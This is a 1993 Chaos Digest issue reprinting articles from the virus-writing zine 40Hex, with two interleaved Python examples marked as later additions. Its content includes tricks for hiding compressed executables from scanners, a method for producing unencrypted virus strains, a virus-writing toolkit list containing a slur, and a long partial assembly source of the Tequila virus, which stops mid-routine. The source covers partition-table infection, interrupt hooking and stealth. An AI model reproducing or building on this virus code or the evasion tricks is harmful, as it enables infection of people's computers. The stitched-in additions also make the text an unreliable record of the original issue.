Chaos Digest              Wednesday 2 June 1993        Volume 1 : Number 43
                            ISSN 1244-4901

      Editor: Jean-Bernard Condat ([email protected])
      Archivist: Yves-Marie Crabbe
      Co-editors: Arnaud Bigare, Stephane Briere

TABLE OF CONTENTS, #1.43 (2 June 1993)
File 1--40H VMag Issue 1 Volume 4 #009-012(1) (reprint)

Chaos Digest is a weekly electronic journal/newsletter. Subscriptions are
available at no cost by sending a message to:
               [email protected]
with a mail header or first line containing the following information:
                   X-Mn-Admin: join CHAOS_DIGEST

The editors may be contacted by voice (+33 1 47874083), fax (+33 1 47877070)
or S-mail at: Jean-Bernard Condat, Chaos Computer Club France [CCCF], B.P.
155, 93404 St-Ouen Cedex, France.  He is a member of the EICAR and EFF (#1299)
groups.

Issues of ChaosD can also be found from the ComNet in Luxembourg BBS (+352)
466893.  Back issues of ChaosD can be found on the Internet as part of the
Computer underground Digest archives. They're accessible using anonymous FTP:

       * kragar.eff.org [192.88.144.4] in /pub/cud/chaos
       * uglymouse.css.itd.umich.edu [141.211.182.53] in /pub/CuD/chaos
       * halcyon.com [192.135.191.2] in /pub/mirror/cud/chaos
       * ftp.cic.net [192.131.22.2] in /e-serials/alphabetic/c/chaos-digest
       * cs.ubc.ca [137.82.8.5] in /mirror3/EFF/cud/chaos
       * ftp.ee.mu.oz.au [128.250.77.2] in /pub/text/CuD/chaos
       * nic.funet.fi [128.214.6.100] in /pub/doc/cud/chaos
       * orchid.csv.warwick.ac.uk [137.205.192.5] in /pub/cud/chaos

CHAOS DIGEST is an open forum dedicated to sharing French information among
computerists and to the presentation and debate of diverse views. ChaosD
material may be reprinted for non-profit as long as the source is cited.
Some authors do copyright their material, and they should be contacted for
reprint permission.  Readers are encouraged to submit reasoned articles in
French, English or German languages relating to computer culture and
telecommunications.  Articles are preferred to short responses.  Please
avoid quoting previous posts unless absolutely necessary.

DISCLAIMER: The views represented herein do not necessarily represent
           the views of the moderators. Chaos Digest contributors
           assume all responsibility for ensuring that articles
           submitted do not violate copyright protections.

----------------------------------------------------------------------

Date: Tue May 11 09:24:40 PDT 1993
From: [email protected] (American_Eagle_Publication_Inc. )
Subject: File 1--40H VMag Issue 1 Volume 4 #009-012(1) (reprint)


40Hex Issue 4                                            December 1991

                     Hacked Pklite File Scanning
                     +++++++++++++++++++++++++++

  In issue two, I believe it was, I released a method of making Pklite
  files un-decompressable and undetectable.  Well, it seems a few people
  used the trick for wrongdoing.  What do I mean by wrongdoing, you
  ask?  Well, let's just say lame trojans and such.

  Anyway, I had a few sysops on my ass about the trick, so now I
  must release.... the hacked Pklite scanning strings.   Well, I
  could really give a fuck if someone's BBS gets crashed, but then again
  I am friends with a lot of sysops.  And besides, I have a new trick
  anyway :)

  Well, there are two strings.  One for .EXE files and one for .COM
  files.  And here they are.

+----------------------------------------------------------------------

  "01 F0 FF 50 00 00 00 03 01" Pklite EXE
  "53 33 DB 53 CB 03 01"       Pklite COM

+----------------------------------------------------------------------
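As an added example (not from the 40Hex article), here is a small scanner that turns the two scan strings above into byte patterns and reports every offset at which they occur, so a sysop can check uploads for hacked Pklite headers. SAMPLE is a constructed buffer, not a real Pklite file, the `??` one-byte wildcard is an addition that the page's own strings do not use, and all function names are this example's own.

```python
import re
from pathlib import Path

# Scan strings reprinted above (40Hex issue 4), written as space-separated
# hex bytes.  "??" is a one-byte wildcard this example adds; the page's own
# strings do not use it.
SIGNATURES = {
    "Pklite EXE (hacked)": "01 F0 FF 50 00 00 00 03 01",
    "Pklite COM (hacked)": "53 33 DB 53 CB 03 01",
}


def compile_signature(hex_string):
    """Compile a hex scan string into a bytes regex (wildcards become '.')."""
    parts = []
    for token in hex_string.split():
        if token == "??":
            parts.append(b".")
        else:
            parts.append(re.escape(bytes([int(token, 16)])))
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: compile_signature(sig) for name, sig in SIGNATURES.items()}


def scan_bytes(data, signatures=COMPILED):
    """Return (signature name, offset) for every match, ordered by offset."""
    hits = []
    for name, pattern in signatures.items():
        for match in pattern.finditer(data):
            hits.append((name, match.start()))
    return sorted(hits, key=lambda hit: hit[1])


def scan_file(path, signatures=COMPILED):
    """Read a file from disk and scan it; same result shape as scan_bytes."""
    return scan_bytes(Path(path).read_bytes(), signatures)


# Constructed sample: 32 bytes of filler, the EXE scan string, 16 bytes of
# filler, then the COM scan string.  Not a real Pklite file.
SAMPLE = (
    b"\x00" * 32
    + bytes.fromhex("01 F0 FF 50 00 00 00 03 01")
    + b"\x90" * 16
    + bytes.fromhex("53 33 DB 53 CB 03 01")
)

if __name__ == "__main__":
    for name, offset in scan_bytes(SAMPLE):
        print(f"{name} at offset 0x{offset:04X}")
```

The scanner is a plain substring search with no file-format awareness; a real checker would also confirm the file is an EXE or COM before trusting a hit, since nine arbitrary bytes can appear by chance in large binaries.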

What's my new trick???  Well, I won't reveal it at this point... But here
is another compression trick.  It lets you compress a file with Pklite
and then again with LZExe.

First
+----

Compress the file with Pklite

Next
+---

Compress the file with LZExe

It won't let you, because the file becomes bigger...

But
+--

Use the DOS Undelete function to undelete the file ?zexe.tmp.  That's the
twice-compressed file.  Rename it to whatever you want.  Destroy the LZ
header... And there you have it...

+++++

40Hex Issue 4                                            December 1991

            A Further Look Into Cracking Encrypted Viruses
            ++++++++++++++++++++++++++++++++++++++++++++++


In Censor #1, Rabids' Data Disruptor showed a way to decrypt
encrypted viruses.  The only problem with the method shown is that
once you decrypt the virus, it cannot be run without modification.
I wish to take his theory a little farther, with a different approach.

There is a really simple way around the problem.  What you will
need is a debugger.  I prefer Turbo Debugger, by Borland.  However,
if you are good with the DOS utility Debug, you may be able to follow along.

The routine to unencrypt is simple, really simple.  What you will
need to do is make a small target file for the virus to infect.  A
file of 100 bytes or less is preferred.

Step One
+-------

Copy the target file to a different filename to make two copies of
the file.  Example - COPY TARGET.COM DUDE.COM

Step Two
+-------

Infect one of the files, by whatever means the virus uses to infect.
Remember, just infect one of the two files.

Step Three
+---------

Load up your debugger (I'm gonna give Turbo Debugger steps, so people
with Debug and the Microsoft Debugger will have to improvise) and
get ready to single-step through the virus.

Step Four
+--------

Start single-stepping through the virus.  If the virus is encrypted
you will hit a loop somewhere near the beginning of the code.   In
most cases this is an XOR loop.  It will look something like this...

add si, [1234]
mov di, si
mov cx, 0123      ;this would be the virus size to unencrypt
mov ah, [0105]    ;(*) this is the encryption value's offset, or the
                  ;actual encryption value if no brackets are
                  ;around it; the key stays in ah while al is used
                  ;for each byte
cld               ;auto increment (clear direction flag)
lodsb             ;load byte from si position into al
xor al, ah        ;xor that byte with the key
stosb             ;store it at di (same as si)
loop 0110         ;loop until cx=0 NOTE: 0110 will be an offset
ret               ;return when done

The operand on the line marked "*" is either the location of the
encryption value (if it is in brackets) or the encryption value itself
(if it is not).  If there are no brackets, keep that number in mind.
Otherwise write the offset down.

Step Five
+--------

When the encryption procedure is done, the virus is unencrypted.
If you were to write the virus to disk now, it would not run, because
as soon as the virus runs it XORs itself again (re-encrypting the
now-plain body) and then jumps into the encrypted code.

Follow the program to the part where the virus is about to write the
virus to the host program.  It will again call on the encryption
routine.

Here it is again, but this time, before it XORs anything, load the
encryption value with 0's.  If it is a byte value load it with 00,
if it is a word value load it with 0000, as in...


add si, [1234]
mov di, si
mov cx, 0123      ;this would be the virus size to unencrypt
mov ah, 00        ;change the encryption value to zero, so the
                  ;encryption will not take place at all.  Instead
                  ;the virus will produce an original strain.
cld               ;auto increment (clear direction flag)
lodsb             ;load byte from si position into al
xor al, ah        ;xor that byte with the (now zero) key
stosb             ;store it at di (same as si)
loop 0110         ;loop until cx=0 NOTE: 0110 will be an offset
ret               ;return when done

Now run the program at full speed.  The next file the virus infects
will be unencrypted, and executable.

NOTE: This method will work only for the types of viruses that use
this type of encryption.  Mainly non-resident .COM and .EXE
infectors.  In other words, don't go thinking this trick will work
on Whale or anything.
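As an added example (not part of the 40Hex article), the XOR loop above emulated statically in Python, so an analyst holding a dump of the encrypted body plus the encryption value can recover the plaintext for disassembly without ever executing the sample; it also shows why a zero key turns the loop into a no-op, which is what step five relies on, and how a single-byte key can be recovered from a few known plaintext bytes. PLAIN, KEY and every function name are constructed for this example.

```python
# Constructed 8-byte "body" and single-byte key; not taken from any sample.
PLAIN = bytes.fromhex("b409ba1401cd21c3")
KEY = 0x5A


def xor_loop(body, key, count=None):
    """Emulate the loop: CX = count, then LODSB / XOR AL,AH / STOSB with the
    encryption value held in AH.  XOR is its own inverse, so one call decrypts
    an encrypted body and the same call re-encrypts a plain one."""
    if not 0 <= key <= 0xFF:
        raise ValueError("the loop above uses a single-byte key")
    if count is None:
        count = len(body)
    out = bytearray(body)
    for i in range(min(count, len(out))):   # LOOP runs CX times
        out[i] ^= key
    return bytes(out)


def recover_key(encrypted, known_prefix):
    """Known-plaintext key recovery: if every byte of a known prefix XORs to
    the same value, that value is the key; otherwise the scheme is not a
    plain single-byte XOR and the loop above does not apply."""
    candidates = {c ^ p for c, p in zip(encrypted, known_prefix)}
    if len(candidates) != 1:
        raise ValueError("prefix does not fit a single-byte XOR key")
    return candidates.pop()


# What an analyst would see in a file or memory dump of the infected target.
ENCRYPTED = xor_loop(PLAIN, KEY)


def decrypt_statically(encrypted, key):
    """Step four without a debugger: apply the loop to a captured body."""
    return xor_loop(encrypted, key)


def zero_key_is_identity(encrypted):
    """Step five: with the encryption value set to 0 the loop writes the body
    back unchanged, which is why the next copy is written in the clear."""
    return xor_loop(encrypted, 0) == encrypted


if __name__ == "__main__":
    key = recover_key(ENCRYPTED, PLAIN[:2])
    body = decrypt_statically(ENCRYPTED, key)
    print(f"recovered key {key:#04x}; body {body.hex()}")
```

The `count` argument mirrors CX: only the first CX bytes are touched, so a dump that includes the decryptor stub itself can be handled by passing the body length rather than the whole buffer.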

+++++

40Hex Issue 4                                            December 1991

                The Ultimate Virus Programmers Toolkit
                ++++++++++++++++++++++++++++++++++++++

Just thought it would be funny to list what I think is the ultimate virus
programmer's toolkit.  Theories may vary.

- Turbo Assembler (MASM sucks, and it is slow)
- Turbo Debugger (It rules, what else can I say?)
- Quick Edit (Small, Fast and Turbo-like keys)
- Sourcer 486 (The ONLY real disassembler out)
- Virus Scan by McAfee Assoc. (It really is a great tool)
- VSUM (Patti Hoffman is a stupid bitch, but I must admit, this
       program is the virus underground bible)
- VSAFE from Central Point Anti-Virus (Not as annoying as Flu-Shot)
- Pklite Professional (If you don't have it - get it)
- Norton 6.0 (Diskedit alone is worth the d/l time)
- Pc-Backup by Central Point (we all fuck up sooner or later)
- MEMWALK.EXE (great shareware program, like diskedit for memory)
- Teledisk (for boot block virus saves)
- Trunc - by Skism Programming (Electronic file shredder)
- Microsoft Press Quick Reference Series
          - DOS Functions  (INT 20 - 26)
          - ROM and BIOS functions (INT 10, 15 - 16)
          - MS DOS extensions (Expanded, extended memory interrupts)
- _Undocumented DOS_ or any current text file on the subject
- 40HEX magazine (Well I do have good stuff here, sometimes)
- Dark Angel's Phunky Virus writing guide (pretty hard to come by.
                                          He explains stuff well)
- The following source code
          - Leprosy-B (beginners only on this one, none-the-less)
          - Cancer (well documented, intermediate)
          - Tiny-F (not bad intro to .COM infections)
          - Dark Avenger (widely available and excellent tips on .EXE
                          infection)
          - Stoned II (boot block intro)
          - Secure 2.0 (I got the source to this.  It is a virus
                        detection system from the guy who wrote
                        1260, Mark Washburn.  The source has some
                        great examples on debug trapping, TSR
                        skills, and encryption)
          - IBM Scan source (I have this too, it's funny... Kinda
                             like McAfee's SCAN but lamer.  By
                             David Chess)
- An account on the Bulgarian Virus Exchange +359-220-4198
- An account on a BBS with Fido-Nets' virus echo (keep track of your
                                                latest score)
- Many accounts on the Homebase BBS (408) 988-4004 2400 bps
                                   (408) 988-5138 HST 9600
                                   (408) 988-5190 v32 9600
 (Tell Areyh I sent ya')
- Scientific Calculator (Hex ain't easy)
- Vivaren (Helps you break night, or any other controlled substance)
- Food, smokes, or whatever your vice is...


That'll do it...

+++++

40Hex Issue 4                                            December 1991

                      The Tequila Virus Source
                      ++++++++++++++++++++++++

   Nuff' said.

----------------------------------------------------------------------------
                  ;=============================
                  ;      the tequila virus     =
                  ;        a recompilable      =
                  ;         dis-assembly       =
                  ;    specifically designed   =
                  ; for assembly to a COM file =
                  ;  with the A86 assembler.   =
                  ;     ++++++++++++++++++     =
                  ; If you desire a "perfect"  =
                  ; byte for byte source code  =
                  ;match-up, the MASM assembler=
                  ; must be used and the noted =
                  ;instructions must be changed=
                  ; to comply with MASM syntax.=
                  ; In addition, all byte and  =
                  ;word pointer references must=
                  ; be changed from B and W to =
                  ;   BYTE POINTER and WORD    =
                  ;          POINTER.          =
                  ;=============================


CODE_SEG   SEGMENT
ASSUME CS:CODE_SEG, DS:CODE_SEG, ES:CODE_SEG, SS:CODE_SEG
ORG 0100
TEQUILA PROC NEAR

JMP START

 DB 000, 000, 000, 000, 000, 000, 000, 0FFH, 0FFH
 DB 009, 005, 001H, 010H, 000, 000, 002H, 0FAH, 000, 00CH

 DB 00DH, 00AH, 00DH, 00AH
 DB "Welcome to T.TEQUILA's latest production.", 00DH, 00AH
 DB "Contact T.TEQUILA/P.o.Box 543/6312 St'hausen/"
 DB "Switzerland.", 00DH, 00AH
 DB "Loving thoughts to L.I.N.D.A", 00DH, 00AH, 00DH, 00AH
 DB "BEER and TEQUILA forever !", 00DH, 00AH, 00DH, 00AH
 DB "$"

 DB "Execute: mov ax, FE03 / int 21. Key to go on!"


PROGRAM_TERMINATION_ROUTINE:
  PUSH BP
  MOV BP,SP
  SUB SP,0CH
  PUSH AX
  PUSH BX
  PUSH CX
  PUSH DX
  PUSH SI
  PUSH DI
  PUSH ES
  PUSH DS
  PUSH CS
  POP DS
  MOV AX,W[6]
  INC AX
  JE 0243H            ;Masm Mod. Needed
  DEC AX
  JNE 020DH           ;Masm Mod. Needed
  DEC W[8]            ;Masm Mod. Needed
  JNE 0243H           ;Masm Mod. Needed
  JMP 0246H           ;Masm Mod. Needed
  MOV AH,02AH
  CALL INT_21
  MOV SI,CX
  MOV CX,W[8]
  CMP CL,DL
  JNE 022FH           ;Masm Mod. Needed
  MOV AX,SI
  SUB AX,W[6]
  MUL B[011H]         ;Masm Mod. Needed
  ADD AL,DH
  ADD CH,3
  CMP AL,CH
  JAE 0237H           ;Masm Mod. Needed
  MOV W[6],0FFFFH     ;Masm Mod. Needed
  JMP 0243H           ;Masm Mod. Needed
  MOV W[6],0          ;Masm Mod. Needed
  MOV W[8],3          ;Masm Mod. Needed
  JMP 02DF            ;Masm Mod. Needed
  MOV BX,0B800H
  INT 011
  AND AX,030H
  CMP AX,030H
  JNE 0256H           ;Masm Mod. Needed
  MOV BX,0B000H
  MOV ES,BX
  XOR BX,BX
  MOV DI,0FD8FH
  MOV SI,0FC18H
  MOV W[BP-2],SI
  MOV W[BP-4],DI
  MOV CX,01E
  MOV AX,W[BP-2]
  IMUL AX
  MOV W[BP-8],AX
  MOV W[BP-6],DX
  MOV AX,W[BP-4]
  IMUL AX
  MOV W[BP-0C],AX
  MOV W[BP-0A],DX
  ADD AX,W[BP-8]
  ADC DX,W[BP-6]
  CMP DX,0F
  JAE 02B0            ;Masm Mod. Needed
  MOV AX,W[BP-2]
  IMUL W[BP-4]
  IDIV W[0F]          ;Masm Mod. Needed
  ADD AX,DI
  MOV W[BP-4],AX
  MOV AX,W[BP-8]
  MOV DX,W[BP-6]
  SUB AX,W[BP-0C]
  SBB DX,W[BP-0A]
  IDIV W[0D]          ;Masm Mod. Needed
  ADD AX,SI
  MOV W[BP-2],AX
  LOOP 0269           ;Masm Mod. Needed
  INC CX
  SHR CL,1
  MOV CH,CL
  MOV CL,0DB
  ES MOV W[BX],CX     ;Masm Mod. Needed
  INC BX
  INC BX
  ADD SI,012
  CMP SI,01B8
  JL 0260             ;Masm Mod. Needed
  ADD DI,034
  CMP DI,02A3
  JL 025D             ;Masm Mod. Needed
  XOR DI,DI
  MOV SI,0BB
  MOV CX,02D
  CLD
  MOVSB
  INC DI
  LOOP 02D7           ;Masm Mod. Needed
  XOR AX,AX
  INT 016
  POP DS
  POP ES
  POP DI
  POP SI
  POP DX
  POP CX
  POP BX
  POP AX
  MOV SP,BP
  POP BP
  RET

PRINT_MESSAGE:
  PUSH DX
  PUSH DS
  PUSH CS
  POP DS
  MOV AH,9
  MOV DX,012
  CALL INT_21
  POP DS
  POP DX
  RET

NEW_PARTITION_TABLE:
  CLI
  XOR BX,BX
  MOV DS,BX
  MOV SS,BX
  MOV SP,07C00
  STI
  XOR DI,DI
  SUB W[0413],3            ;Masm Mod. Needed
  INT 012
  MOV CL,6
  SHL AX,CL
  MOV ES,AX
  PUSH ES
  MOV AX,022A
  PUSH AX
  MOV AX,0205
  MOV CX,W[07C30]
  INC CX
  MOV DX,W[07C32]
  INT 013
  RETF

DB 002, 0FE
DB 04C, 0E9
DB 080, 004

  PUSH CS
  POP DS
  XOR AX,AX
  MOV ES,AX
  MOV BX,07C00
  PUSH ES
  PUSH BX
  MOV AX,0201
  MOV CX,W[0226]
  MOV DX,W[0228]
  INT 013
  PUSH CS
  POP ES
  CLD
  MOV SI,0409
  MOV DI,09BE
  MOV CX,046
  REP MOVSB
  MOV SI,091B
  MOV DI,0A04
  MOV CX,045
  REP MOVSB
  CLI
  XOR AX,AX
  MOV ES,AX
  ES LES BX,[070]           ;Masm Mod. Needed
  MOV W[09B0],BX            ;Masm Mod. Needed
  MOV W[09B2],ES            ;Masm Mod. Needed
  MOV ES,AX
  ES LES BX,[084]           ;Masm Mod. Needed
  MOV W[09B4],BX            ;Masm Mod. Needed
  MOV W[09B6],ES            ;Masm Mod. Needed
  MOV ES,AX
  ES MOV W[070],044F        ;Masm Mod. Needed
  ES MOV W[072],DS          ;Masm Mod. Needed
  STI
  RETF

INSTALL:
  CALL NEXT_LINE
NEXT_LINE:
  POP SI
  SUB SI,028F
  PUSH SI
  PUSH AX
  PUSH ES
  PUSH CS
  POP DS
  MOV AX,ES
  ADD W[SI+2],AX
  ADD W[SI+4],AX
  DEC AX
  MOV ES,AX
  MOV AX,0FE02
  INT 021
  CMP AX,01FD
  JE NO_PARTITION_INFECTION
  ES CMP B[0],05A           ;Masm Mod. Needed
  JNE NO_PARTITION_INFECTION
  ES CMP W[3],0BB           ;Masm Mod. Needed
  JBE NO_PARTITION_INFECTION
  ES MOV AX,W[012]          ;Masm Mod. Needed
  SUB AX,0BB
  MOV ES,AX
  XOR DI,DI
  MOV CX,09A4
  CLD
  REP MOVSB
  PUSH ES
  POP DS
  CALL INFECT_PARTITION_TABLE
NO_PARTITION_INFECTION:
  POP ES
  POP AX
  PUSH ES
  POP DS
  POP SI
  CS MOV SS,W[SI+4]         ;Masm Mod. Needed
CHAIN_TO_THE_HOST_FILE:
  CS JMP D[SI]              ;Masm Mod. Needed

INFECT_PARTITION_TABLE:
  MOV AH,02A
  INT 021
  MOV W[6],CX               ;Masm Mod. Needed
  MOV W[8],DX               ;Masm Mod. Needed
  MOV AH,052
  INT 021
  ES MOV AX,W[BX-2]         ;Masm Mod. Needed
  MOV W[03E8],AX            ;Masm Mod. Needed
  MOV AX,03513
  INT 021
  MOV W[09A0],BX            ;Masm Mod. Needed
  MOV W[09A2],ES            ;Masm Mod. Needed
  MOV AX,03501
  INT 021
  MOV SI,BX
  MOV DI,ES
  MOV AX,02501
  MOV DX,03DA
  INT 021
  MOV B[0A],0               ;Masm Mod. Needed
  PUSHF
  POP AX
  OR AX,0100
  PUSH AX
  POPF
  MOV AX,0201
  MOV BX,09A4
  MOV CX,1
  MOV DX,080
  PUSH DS
  POP ES
  PUSHF
  CALL D[09A0]              ;Masm Mod. Needed
  PUSHF
  POP AX
  AND AX,0FEFF
  PUSH AX
  POPF
  PUSHF
  MOV AX,02501
  MOV DX,SI
  MOV DS,DI
  INT 021
  POPF
  JAE 0450                  ;Masm Mod. Needed
  JMP RET                   ;Masm Mod. Needed
  PUSH ES
  POP DS
  CMP W[BX+02E],0FE02
  JNE 045C                  ;Masm Mod. Needed
  JMP RET                   ;Masm Mod. Needed
  ADD BX,01BE
  MOV CX,4
  MOV AL,B[BX+4]
  CMP AL,4
  JE 0479                   ;Masm Mod. Needed
  CMP AL,6
  JE 0479                   ;Masm Mod. Needed
  CMP AL,1
  JE 0479                   ;Masm Mod. Needed
  ADD BX,010
  LOOP 0463                 ;Masm Mod. Needed
  JMP SHORT RET             ;Masm Mod. Needed
  MOV DL,080
  MOV DH,B[BX+5]
  MOV W[0228],DX            ;Masm Mod. Needed
  MOV AX,W[BX+6]
  MOV CX,AX
  MOV SI,6
  AND AX,03F
  CMP AX,SI
  JBE RET                   ;Masm Mod. Needed
  SUB CX,SI
  MOV DI,BX
  INC CX
  MOV W[0226],CX            ;Masm Mod. Needed
  MOV AX,0301
  MOV BX,09A4
  PUSHF
  CALL D[09A0]              ;Masm Mod. Needed
  JB RET                    ;Masm Mod. Needed
  DEC CX
  MOV W[DI+6],CX
  INC CX
  SUB W[DI+0C],SI
  SBB W[DI+0E],0
  MOV AX,0305
  MOV BX,0
  INC CX
  PUSHF
  CALL D[09A0]              ;Masm Mod. Needed
  JB RET                    ;Masm Mod. Needed
  MOV SI,01F6
  MOV DI,09A4
  MOV CX,034
  CLD
  REP MOVSB
  MOV AX,0301
  MOV BX,09A4
  MOV CX,1
  XOR DH,DH
  PUSHF
  CALL D[09A0]              ;Masm Mod. Needed
  RET

NEW_INTERRUPT_ONE:
  PUSH BP
  MOV BP,SP
  CS CMP B[0A],1            ;Masm Mod. Needed
  JE 0506                   ;Masm Mod. Needed
  CMP W[BP+4],09B4
  JA 050B                   ;Masm Mod. Needed
  PUSH AX
  PUSH ES
  LES AX,[BP+2]
  CS MOV W[09A0],AX         ;Masm Mod. Needed
  CS MOV W[09A2],ES         ;Masm Mod. Needed
  CS MOV B[0A],1
  POP ES
  POP AX
  AND W[BP+6],0FEFF
  POP BP
  IRET

NEW_INTERRUPT_13:
  CMP CX,1
  JNE 054E                  ;Masm Mod. Needed
  CMP DX,080
  JNE 054E                  ;Masm Mod. Needed
  CMP AH,3
  JA 054E                   ;Masm Mod. Needed
  CMP AH,2
  JB 054E                   ;Masm Mod. Needed
  PUSH CX
  PUSH DX
  DEC AL
  JE 0537                   ;Masm Mod. Needed
  PUSH AX
  PUSH BX
  ADD BX,0200
  INC CX
  PUSHF
  CS CALL D[09A0]           ;Masm Mod. Needed
  POP BX
  POP AX
  MOV AL,1
  CS MOV CX,W[0226]         ;Masm Mod. Needed
  CS MOV DX,W[0228]         ;Masm Mod. Needed
  PUSHF
  CS CALL D[09A0]           ;Masm Mod. Needed
  POP DX
  POP CX
  RETF 2
  CS JMP D[09A0]            ;Masm Mod. Needed

NEW_TIMER_TICK_INTERRUPT:
  PUSH AX
  PUSH BX
  PUSH ES
  PUSH DS
  XOR AX,AX
  MOV ES,AX
  PUSH CS
  POP DS
  ES LES BX,[084]           ;Masm Mod. Needed
  MOV AX,ES
  CMP AX,0800
  JA 05B0                   ;Masm Mod. Needed
  CMP AX,W[09B6]
  JNE 0575                  ;Masm Mod. Needed
  CMP BX,W[09B4]
  JE 05B0                   ;Masm Mod. Needed
  MOV W[09B4],BX            ;Masm Mod. Needed
  MOV W[09B6],ES            ;Masm Mod. Needed
  XOR AX,AX
  MOV DS,AX
  CS LES BX,[09B0]          ;Masm Mod. Needed
  MOV W[070],BX             ;Masm Mod. Needed
  MOV W[072],ES             ;Masm Mod. Needed
  LES BX,[04C]              ;Masm Mod. Needed
  CS MOV W[09A0],BX         ;Masm Mod. Needed
  CS MOV W[09A2],ES         ;Masm Mod. Needed
  MOV W[04C],09BE           ;Masm Mod. Needed
  MOV W[04E],CS             ;Masm Mod. Needed
  MOV W[084],04B1           ;Masm Mod. Needed
  MOV W[086],CS             ;Masm Mod. Needed
  POP DS
  POP ES
  POP BX
  POP AX
  IRET

INT_21_INTERCEPT:
  CMP AH,011
  JB CHECK_FOR_HANDLE
  CMP AH,012
  JA CHECK_FOR_HANDLE
  CALL ADJUST_FCB_MATCHES
  RETF 2
CHECK_FOR_HANDLE:
  CMP AH,04E
  JB CHECK_FOR_PREVIOUS_INSTALLATION
  CMP AH,04F
  JA CHECK_FOR_PREVIOUS_INSTALLATION
  CALL ADJUST_HANDLE_MATCHES
  RETF 2
CHECK_FOR_PREVIOUS_INSTALLATION:
  CMP AX,0FE02
  JNE CHECK_FOR_MESSAGE_PRINT
  NOT AX
  IRET
CHECK_FOR_MESSAGE_PRINT:
  CMP AX,0FE03
  JNE CHECK_FOR_EXECUTE
  CS CMP W[6],0             ;Masm Mod. Needed
  JNE CHAIN_TO_TRUE_INT_21
  CALL PRINT_MESSAGE
  IRET
CHECK_FOR_EXECUTE:
  CMP AX,04B00
  JE SET_STACK
  CMP AH,04C
  JNE CHAIN_TO_TRUE_INT_21
SET_STACK:
  CS MOV W[09A6],SP         ;Masm Mod. Needed
  CS MOV W[09A8],SS         ;Masm Mod. Needed
  CLI
  PUSH CS
  POP SS
  MOV SP,0AE5
  STI
  CMP AH,04C
  JNE TO_AN_INFECTION
  CALL PROGRAM_TERMINATION_ROUTINE
  JMP SHORT NO_INFECTION
TO_AN_INFECTION:
  CALL INFECT_THE_FILE
NO_INFECTION:
  CLI
  CS MOV SS,W[09A8]         ;Masm Mod. Needed
  CS MOV SP,W[09A6]         ;Masm Mod. Needed
  STI
  JMP SHORT CHAIN_TO_TRUE_INT_21
CHAIN_TO_TRUE_INT_21:
  CS INC W[09BC]            ;Masm Mod. Needed
  CS JMP D[09B4]            ;Masm Mod. Needed

NEW_CRITICAL_ERROR_HANDLER:
  MOV AL,3
  IRET

ADJUST_FCB_MATCHES:
  PUSH BX
  PUSH ES
  PUSH AX
  MOV AH,02F
  CALL INT_21
  POP AX
  PUSHF
  CS CALL D[09B4]           ;Masm Mod. Needed
  PUSHF
  PUSH AX
  CMP AL,0FF
  JE 0664                   ;Masm Mod. Needed
  ES CMP B[BX],0FF          ;Masm Mod. Needed
  JNE 064F                  ;Masm Mod. Needed
  ADD BX,7
  ES MOV AL,B[BX+017]       ;Masm Mod. Needed
  AND AL,01F
  CMP AL,01F
  JNE 0664                  ;Masm Mod. Needed
  ES SUB W[BX+01D],09A4     ;Masm Mod. Needed
  ES SBB W[BX+01F],0        ;Masm Mod. Needed
  POP AX
  POPF
  POP ES
  POP BX
  RET

ADJUST_HANDLE_MATCHES:
  PUSH BX
  PUSH ES
  PUSH AX
  MOV AH,02F
  CALL INT_21
  POP AX
  PUSHF
  CS CALL D[09B4]           ;Masm Mod. Needed
  PUSHF
  PUSH AX
  JB 0691                   ;Masm Mod. Needed
  ES MOV AL,B[BX+016]       ;Masm Mod. Needed
  AND AL,01F
  CMP AL,01F
  JNE 0691                  ;Masm Mod. Needed
  ES SUB W[BX+01A],09A4     ;Masm Mod. Needed
  ES SBB W[BX+01C],0        ;Masm Mod. Needed
  POP AX
  POPF
  POP ES
  POP BX
  RET

WRITE_TO_THE_FILE:
  MOV AH,040
  JMP 069C                  ;Masm Mod. Needed

READ_FROM_THE_FILE:
  MOV AH,03F
  CALL 06B4                 ;Masm Mod. Needed
  JB RET                    ;Masm Mod. Needed
  SUB AX,CX
  RET

MOVE_TO_END_OF_FILE:
  XOR CX,CX
  XOR DX,DX
  MOV AX,04202
  JMP 06B4                  ;Masm Mod. Needed

MOVE_TO_BEGINNING_OF_FILE:
  XOR CX,CX
  XOR DX,DX
  MOV AX,04200
  CS MOV BX,W[09A4]         ;Masm Mod. Needed

INT_21:
  CLI
  PUSHF
  CS CALL D[09B4]           ;Masm Mod. Needed
  RET

INFECT_THE_FILE:
  PUSH AX
  PUSH BX
  PUSH CX
  PUSH DX
  PUSH SI
  PUSH DI
  PUSH ES
  PUSH DS
  CALL CHECK_LETTERS_IN_FILENAME
  JAE GOOD_NAME
  JMP BAD_NAME

GOOD_NAME:
  PUSH DX
  PUSH DS
  PUSH CS
  POP DS

SAVE_AND_REPLACE_CRITICAL_ERROR_HANDLER:
  MOV AX,03524
  CALL INT_21
  MOV W[09B8],BX            ;Masm Mod. Needed
  MOV W[09BA],ES            ;Masm Mod. Needed
  MOV AX,02524
  MOV DX,052A
  CALL INT_21
  POP DS
  POP DX

SAVE_AND_REPLACE_FILE_ATTRIBUTE:
  MOV AX,04300
  CALL INT_21
  CS MOV W[09AA],CX         ;Masm Mod. Needed
  JAE 06FE                  ;Masm Mod. Needed
  JMP RESTORE_CRIT_HANDLER
  MOV AX,04301
  XOR CX,CX
  CALL INT_21
  JB 077C                   ;Masm Mod. Needed

OPEN_FILE_FOR_READ_WRITE:
  MOV AX,03D02
  CALL INT_21
  JB 0771                   ;Masm Mod. Needed
  PUSH DX
  PUSH DS
  PUSH CS
  POP DS
  MOV W[09A4],AX            ;Masm Mod. Needed

GET_FILEDATE:
  MOV AX,05700
  CALL 06B4                 ;Masm Mod. Needed
  JB 075C                   ;Masm Mod. Needed
  MOV W[09AC],DX            ;Masm Mod. Needed
  MOV W[09AE],CX            ;Masm Mod. Needed

READ_AND_CHECK_EXE_HEADER:
  CALL 06AD                 ;Masm Mod. Needed
  MOV DX,0A49
  MOV CX,01C
  CALL 069A                 ;Masm Mod. Needed
  JB 075C                   ;Masm Mod. Needed
  PUSH DS
  POP ES
  MOV DI,0E8
  MOV CX,020
  CMP W[0A49],05A4D         ;Masm Mod. Needed
  JNE 075C                  ;Masm Mod. Needed
  MOV AX,W[0A5B]
  CLD
  REPNE SCASW
  JNE 0754                  ;Masm Mod. Needed
  OR W[09AE],01F            ;Masm Mod. Needed
  JMP 075C                  ;Masm Mod. Needed
  CALL READ_PAST_END_OF_FILE
  JB 075C                   ;Masm Mod. Needed
  CALL ENCRYPT_AND_WRITE_TO_FILE

RESTORE_ALTERED_DATE:
